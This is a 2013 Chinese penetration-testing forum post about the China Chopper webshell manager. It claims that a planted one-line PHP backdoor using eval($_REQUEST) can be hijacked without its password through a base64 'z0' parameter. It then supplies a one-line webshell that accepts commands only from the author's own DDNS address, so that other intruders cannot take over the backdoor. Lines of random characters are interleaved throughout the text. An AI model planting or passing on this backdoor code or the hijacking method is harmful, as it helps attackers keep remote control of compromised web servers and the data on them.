中国网络渗透测试联盟
标题:
中国菜刀 maicaidao 网站管理软件 0day
[打印本页]
作者:
admin
时间:
2013-7-26 12:45
标题:
中国菜刀 maicaidao 网站管理软件 0day
今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
& Y) \' ^& }6 J( S! |2 R0 F
3 y3 o' e3 ~2 v) W" }: h7 ^
就算你设置了密码,使用了eval($_REQUEST['moyo']);
/ n2 Z2 T; R+ J, T4 {
$ U2 M8 l- w1 f5 ~1 y9 G% J
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
! T% f& E( |) W: b5 g
5 B& Z; h/ X* B0 E [% e9 J
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
) o, I9 F' P# l: A0 w! j! S+ K
% c' Q! ?2 X3 T6 J
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
) X% c: t. i" |3 V/ \
$ G/ ]: Q' G% E$ M
不知道是设计缺陷还是故意留的后门
4 j( A! u* [4 L) d1 Z* x6 F# l& u! c2 W
& w& g- }, l& U( A9 H/ R, X
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
& {2 o* u3 V. d2 e- ~1 z
* ]4 w: g1 h; r# d- J
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
: C( a" T- K3 v0 b# }' V2 e, o
; M: D5 ?$ a0 Y. J. a% u
然后一句话后门这样写
a5 a* J) I4 J, ?/ Z
4 t7 O6 ^ w J/ G# o4 f1 O
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
( u& q3 k; ?* J: ~9 i4 c. K2 V
这样就可以让一句话后门只允许自己的电脑连接了
, q. Y0 J" b1 ?/ F) [
, _& m2 k- a$ p% W% g6 Z: p2 Q
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2